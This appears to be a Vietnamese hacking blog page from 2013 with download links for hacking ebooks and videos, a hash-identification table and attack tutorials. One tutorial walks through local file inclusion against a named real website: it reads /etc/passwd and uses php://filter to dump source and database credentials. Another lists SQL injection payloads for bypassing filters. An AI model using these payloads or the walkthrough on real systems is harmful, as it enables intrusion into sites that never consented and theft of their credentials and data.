6 thg 2, 2013

no image

Books/Tutorials XSS, LFI, RFI, SQLI

XSS

27341454-Cross-Site-Scripting-Attack-and-Defense-Guide.pdf
LFI & RFI

6498408-Remote-and-Local-File-Inclusion-Explained.pdf
SQLI

SQL Injection Attacks and Defense (2009).pdf
no image

Kết Hợp Khai thác giữa XSS + MSF

Leech sang MF cho ae down cho tiện.

http://www.mediafire.com/?89upicy6538obuj

Pass: vhb

P/S: Link MediaFire by Juno_okyo.

no image

150 free Hacking Ebooks Collection

1. HACKING - GENERAL
Coding+Tut
Computer Virus 4 Dummies
Ethical Hacking and Countermeasures
Extreme Tech Hacking Gmail
Google_Secrets



Gray_Hat_Hacking
Hacking Exposed 6th Edition
Hacking For Beginners
Hacking for Dummies - Kevin Beaver
Hacking Secrets Revealed
How To Hack Hacker Highschool
Kevin Mitnick - Ghost in the wires
Kevin Mitnick - The Art of Deception
Kevin Mitnick - The Art of Intrusion
Telnet Tutorial
The Ethical Hack
The Hackers Underground Handbook
Website_Hacking_Secrets
Wi-fi security

Download Click Here

2. SQL TUTORIALS
Mastering_MySQL_4.2003.Sybex
MySQL - 2nd Edition (Sams)
MySQL - Essential Skills (2004)
MySQL - Visual QuickStart Guide, 2nd Edition (2006)
MySQL Certification Study Guide (2004)
MySQL Cookbook (2002)
MySQL Cookbook
MySQL Pocket Reference (2003)
MySQL Tutorial (2003)
MySQL.PHP.Database.Applications
SQL - A Beginner's Guide, 2nd Edition (2003)
SQL - Practical Guide For Developers (2005)
SQL Bible (2003)
SQL Cookbook (2005)
SQL For Dummies, 6th Edition (2006)
SQL Sams Teach Yourself MySQL in 21 Days -- SAMS
SQL Server 2000

Download Click Here

3. NETWORK SECURITY
Cryptography And Network Security, 4th Edition (2005).chm
Designing And Implementing Linux Firewalls And QoS (2006)
Firewall Policies And VPN Configurations (2006)
Fundamentals of Network Security
LANSecurity
Maximum Computer Security-A Hacker's Guide
McGraw Hill - Hacking Exposed - Network Security, Secrets
Network Security Assessment - From Vulnerability To Patch (2006)
Network Security Hacks - 100 Industrial-Strength Tips & Tools
Network Security With OpenSSL (2002)
Self-Defending Networks - The Next Generation Of Network Security

Download Click Here

4. NETWORK PROGRAMMING
Illustrated TCP-IP - A Graphic Guide To The Protocol Suite (1999)
Prentice Hall - Internetworking with TCP-IP, Volume I - Principles, Protocols and Architecture
Prentice Hall - Internetworking with TCPIP - Vol 3 Client-Server Programming and Applications for the BSD
Sockets Version
Tcp Ip For Dummies
TCP-IP Foundations (2004)
TCP-IP Network Administration, 3rd Edition (2002)
TCPIPSettingsinDOS
TCPIP Tools
Understanding TCP-IP (2006)
Unix Network Programming - Volume I - The Sockets Networking API, 3rd Edition (2003)

Download Click Here

5. UNIX
A Practical Guide To Linux Commands, Editors, And Shell Programming (2005)
Absolute BSD - The Ultimate Guide To FreeBSD (2002)
Absolute OpenBSD - Unix For The Practical Paranoid 2003
Embedded FreeBSD Cookbook (2002)
Get_Acquainted_with_Linux_Security_and_Optimizatio n_System
Hack Proofing Linux - A Guide To Open Source Security (2001)
Learning the UNIX Operating System 4th ed 1998.
Linux Basic Commands
Linux Kernel Development, 2nd Edition
Linux Kernel module programming guide 1
Linux Shell Scripting With Bash (2004)
linuxKernelSux
Linux_Administration_Made_Easy
Linux_Administrators_Security_Guide
Mastering FreeBSD And OpenBSD Security (2005)
McGraw.Hill.HackNotes.Linux.and.Unix.Security.Port able.Reference.eBook-DDU
OReilly - Linux_Network_Administrator's_Guide_Second_Edition
OReilly.Understanding.The Linux Kernel 1st Edition
Sam teach you Linux in 24 hours
Securing Linux A Survival Guide for Linux Security Version 1.0
Securing Linux Server for Service Providers
SELinux (2004)
shell-scripting
SysAdmin - Security Tools in FreeBSD
Teach Yourself FreeBSD In 24 Hours (2003)
The Complete FreeBSD, 4th Edition (2003)
The OpenBSD 4.0 Crash Course (2007)
Understanding The Linux Kernel, 3rd Edition (2005)
Unix Power Tools, 3rd Edition (2002).chm
Unix Shell Programming, 3rd Edition (2003)

Download Click Here

6. PROGRAMMING
Advanced Perl Programming, 2nd Edition (2005)
Assembly Language Step-By-Step - Programming With DOS And Linux, 2nd Edition (2000)
Beginning Linux Programming
Beginning Perl Web Development - From Novice To Professional (2006)
Burtch - Linux Shell Scripting with Bash (2004)
C By Example (1999)
C In A Nutshell (2005).chm
C Primer Plus, 5th Edition (2004)
C-C++ Programmer's Reference, 3rd Edition (2003)
Cryptography In C And C++ (2001)
Effective C++, 3rd Edition (2005)
Glass,Ables - Linux for Programmers and Users (Prentice, 2006)
Guide To Assembly Language Programming In Linux (2005)
Hacker Disassembling Uncovered
Intermediate Perl (2006)
Korn Shell Unix and Linux Programming Manual, 3rd ed 2001
Learning Perl Objects, References, & Modules (2003)
Learning Perl, 4th Edition (2005)
Learning PHP & MySQL (2006)
Matthew - Beginning Linux Programming 4e (Wrox, 2007)
Michael - Mastering UNIX Shell Scripting (Wiley, 2003)
Minimal Perl For UNIX And Linux People (2005)
Mitchell - Advanced Linux Programming (New Riders, 2001)
Optimizing C++ (1999)
Perl Best Practices (2005)
Perl Cookbook
Perl Hacks - Tips And Tools For Programming Debugging And Surviving (2006)
Perl Medic - Transforming Legacy Code (2004)
Programming Embedded Systems In C And C++ (1999)
Secure Programming Cookbook For C And C++ (2003)
Wall - Linux Programming Unleashed (SAMS, 1999)

Download Click Here

7. EXPLOIT
Extreme Exploits - Advanced Defenses Against Hardcore Hacks (2005)
Hacking - The Art Of Exploitation (2003)
Shellcoder's Programming Uncovered (2005)
The Shellcoder's Handbook - Discovering And Exploiting Security Holes (2004)

Download Click Here

4 thg 2, 2013

no image

Tutorial : LFI php://filter

Victim:http://www.hctjstbk.cz/
Bước 1: Tìm link bị lỗi LFI
http://www.hctjstbk.cz/index.php?page=/etc/passwd


Bước 2: Kiểm tra qua /proc/self/environ -> Không được
php://input -> Không được
php://filter/convert.base64-encode/resource=index.php -> okie
Bước 3: Do website mã hóa dùng php://filter file index.php
http://www.hctjstbk.cz/index.php?pag...x.php&soutez=2
[IMG]
This image has been resized.Click to view original image
[/IMG]

Bước 4: View Source copy đoạn mã hóa của file index.php-> vào website giải mã base64 online ở đây mình dùng website
http://www.rbl.jp/base64.php
[IMG]
This image has been resized.Click to view original image
[/IMG]
Bước 5: Sau khi giải mã file index.php để ý đoạn sau config/config.php
Bước 6: php filter file config/config.php
http://www.hctjstbk.cz/index.php?pag...g.php&soutez=2

Viewsource giải mã được database như sau
[IMG]
This image has been resized.Click to view original image
[/IMG]
Bước 7: Connect DB

End tut kakavn_85
no image

Một số cách Bypass SQL injection


Một số trick mình hay dùng khi khai thác.Thường thì chỉ chặn select tuy nhiên có 1 vài trường hợp chặn luôn cả khoảng trắng ở url khi đấy thay các ký tự như /**/ + %252f%252a*/ .... muốn tìm thêm thì nhìn vào setting của havij có mấy cái đấy. Nhưng đấy là số ít, giờ ta vào phần chính:

Cách 1: thay ký tự thường bằng ký tự hoa

id=1+UnIoN SeLeCT 1,2,3,4-- -

Cách 2: dùng cặp thẻ /*!code*/

id=1+/*!UnIoN*/ /*!SeLeCT*/ 1,2,3,4-- -

Cách 3: dùng like thay cho = (khi dấu = bị chặn)

/*!TaBlE_ScHeMa*/+like+database()– -

Cách 4: Lồng Union và select

id=1+UNIunionON+SeLselectECT+1,2,3–

Cách 5 thêm ký tự null hoặc các ký tự đặc biệt vào giữa:

sel%0bect+1,2,3
id=1+uni*on+sel*ect+1,2,3–+
id=1+(UnIoN)+(SelECT)+
id=1+(UnIoN+SeLeCT)+
id=1+(UnI)(oN)+(SeL)(EcT)
id=1+’UnI”On’+'SeL”ECT’

Cách 6: dùng hàm convert():
convert(group_concat(table_name)+using+ascii)
convert(version() using latin1)
aes_decrypt(aes_encrypt(version(),1),1)
unhex(hex(@@version))
cast(version()+as+binary)
convert(version(),binary)
convert(version()+using+binary)

Cách 7: dùng char()
CHAR(117, 115, 101, 114, 115)

Cách 8: show table ẩn:

group_concat(unhex(hex(table_name)))

cách 9: select
UNION all /*!50000SELECT*/

Cách 10 (ít dùng)thêm khoảng trắng tách từ
information_schema. tables thay cho information_schema.tables
no image

tài liệu về mạng Linux,Windows .. và kỹ thuật hack server tổng hợp

12 MB , bao gồm các tài liệu về mạng Linux,Windows .. và kỹ thuật hack server được tổng hợp kỹ lưỡng và gom vào 1 file duy nhất.


link http://www.mediafire.com/?7g1yldy1vf0d2ff
no image

Nhận dạng các loại mã hóa


1.MySQL có 2 loại

60671c896665c3fa MySQL loại 16 kí tự
667f407de7c6ad07358fa38daed7828a72014b4e MySQL5 loại 40 kí tự


2.MD4 có 3 loại:

bde52cb31de33e46245e05fbdbd6fb24 MD4 loại này 32 kí tự
a0f0057303393f643a09d7db430b9fe1 MD4 (HMAC*) 32 kí tự
veUssx3jPkYkXgX729b7JA==Z7g= MD4 (Base64*) Loại này dạng base64 có 28 kí tự

3.MD5 có tới 5 dạng:

0cc175b9c0f1b6a831c399e269772661 MD5 32 kí tự

3673438f11d71c21a9b8b59232a3dd61 MD5 (HMAC) 32 dạng HMAC 32 kí tự

DMF1ucDxtqgxw5niaXcmYQ==Z7g= MD5 (Base64) 28 Kí tự

$1$$Ij31LCAysPM23KuPlm1wA/ MD5 (Unix) 26 kí tự

$apr1$$ny0TwGBt5/BPT4.mbWBKk. MD5 (APR) 29 kí tự.

4.MSCash

9bea8ee5c345f595cd9f9b37a1a2a887 MSCash 32 kí tự
86f7e437faa5a7fce15d1ddcb9eaeaea377667b8

5.SHA-1 có 2 loại:

7f984109f39759f3f41dba04f5183741e36f1445 Sha-1 (HMAC) 40 kí tự
hvfkN/qlp/zhXR3cuerq6jd2Z7g= Sha-1 (Base64) 28 kí tự
no image

Tài liệu hướng dẫn sử dụng Backtrack 5 khai thác lỗ hổng mạng

TÀI LIỆU HƯỚNG DẪN VÀ SỬ DỤNG BACKTRACK 5 ĐỂ KHAI THÁC LỖ HỔNG MẠNG (ATHENA)

 http://www.mediafire.com/view/?cqu3nkulva613ge

MỤC LỤC
Chương Mở Đầu : GIỚI THIỆU VỀ BACKTRACK 5 ..................................... 6
I. Giới thiệu .................................................. ............................................... 6


II. Mục đích .................................................. ................................................ 6
III. Nguồn tải Backtrack : .................................................. ............................ 7
IV. Cài đặt .................................................. .................................................. .. 8
1. Live DVD .................................................. ........................................... 8
2. Install .................................................. .................................................. 8
Chương 1: TÌM HIỂU VẤN ĐỀ BẢO MẬT MẠNG LAN ............................ 16
I. Giới thiệu .................................................. ............................................. 16
II. Vấn đề bảo mật hệ thống và mạng .................................................. ....... 16
1. Các vấn dề chung về bảo mật hệ thống và mạng ............................... 16
2. Một số khái niệm và lịch sử bảo mật hệ thống ................................... 16
3. Các loại lỗ hổng bảo mật và phương thức tấn công mạng chủ yếu ... 17
Chương 2: FOOTPRINTING .................................................. ......................... 21
I. Giới thiệu về Footprinting .................................................. ................... 21
II. Các bước thực hiện Footprinting .................................................. ......... 21
1. Xác định vùng hoạt đông của chúng ta .............................................. 21
2. Các thông tin có sẵn công khai .................................................. ......... 21
3. Whois và DNS Enumeration .................................................. ............ 21
4. Thăm dò DNS .................................................. ................................... 22
5. Thăm dò mạng .................................................. .................................. 22
III. Phương pháp thực hiện Footprinting .................................................. ... 22
IV. Các công cụ thực hiện Footprinting: .................................................. ... 25
1. Sam Spade .................................................. ........................................ 25
2. Super Email Spider .................................................. ........................... 26
3. VitualRoute Trace .................................................. ............................ 27
4. Maltego .................................................. ............................................. 27
Chương 3: SCANNING .................................................. ................................. 28
I. Giới thiệu .................................................. ............................................. 28
II. Chứng năng .................................................. .......................................... 28
1. Xác định hệ thống có đang hoạt động hay không? ............................ 28
2. Xác định các dịch vụ đang chạy hoặc đang lắng nghe. ...................... 31
3. Xác định hệ điều hành .................................................. ...................... 37
Chương 4: ENUMERATION .................................................. ........................ 39
I. Enumeration là gì? .................................................. ............................... 39
II. Banner Grabbing .................................................. .................................. 39
III. Enumerating các dịch vụ mạng .................................................. ............ 39
1. Http fingerprinting .................................................. ............................ 39
2. DNS Enumeration .................................................. ............................ 42
3. Netbios name .................................................. .................................... 44
Chương 5: PASSWORD CRACKING .................................................. .......... 45
I. Giới Thiệu .................................................. ............................................ 45
II. Các Kỹ Thuật Password Cracking .................................................. ....... 45
1. Dictionary Attacks/Hybrid Attacks .................................................. .. 45
2. Brute Forcing Attacks .................................................. ...................... 45
3. Syllable Attacks/Pre-Computed Hashes ............................................. 45
III. Các Kiểu Tấn Công Thường Gặp .................................................. ........ 45
1. Active Password Cracking .................................................. ............... 45
2. Passive Password Cracking .................................................. .............. 46
3. Offline Password Cracking .................................................. .............. 46
IV. Các công cụ Password Cracking .................................................. .......... 46
1. Hydra .................................................. ................................................ 46
2. Medusa .................................................. ............................................. 48
V. Password Cracking Trên Các Giao Thức .............................................. 51
1. HTTP (HyperText Tranfer Protocol) ................................................. 51
2. SSH (Secure Shell) .................................................. ........................... 58
3. SMB (Server Message Block) .................................................. .......... 61
4. RDP (Remote Desktop Protocol) .................................................. ..... 64
Chương 6: SYSTEM HACKING .................................................. .................. 67
I. GIỚI THIỆU VỀ METASPLOIT .................................................. ........ 67
1. Giới thiệu .................................................. .......................................... 67
2. Các thành phần của Metasploit .................................................. ........ 67
3. Sử dụng Metasploit Framework .................................................. ....... 67
4. Giới thiệu Payload Meterpreter .................................................. ........ 68
5. Cách phòng chống .................................................. ............................ 70
II. Lỗi MS10-046 (2286198) .................................................. .................... 70
1. Giới thiệu .................................................. .......................................... 70
2. Các bước tấn công: .................................................. ........................... 71
3. Cách phòng chống .................................................. ............................ 79
III. Lỗi BYPASSUAC .................................................. ............................... 80
1. Giới thiệu .................................................. .......................................... 80
2. Các bước tấn công .................................................. ............................ 80
3. Cách phòng chống .................................................. ............................ 85
Chương 7: WEB HACKING VỚI DVWA .................................................. .... 86
I. Giới thiệu .................................................. ............................................. 86
II. Hướng dẫn cài đặt DVWA trên Backtrack ............................................ 86
1. Tải và cài đặt XAMPP .................................................. ...................... 86
2. Tải và cài đặt DVWA .................................................. ....................... 88
III. Các kĩ thuật tấn công trên DVWA .................................................. ....... 92
1. XSS (Cross-Site Scripting) .................................................. ............... 92
2. SQL Injection .................................................. ................................. 100
TÀI LIỆU THAM KHẢO .................................................. .............................. 106
.................................................. .................................................. .....................
no image

VIdeo local và up shell by pass

http://www.4shared.com/file/79012700/5c813901/Video_local_va_up_shell_bypass.html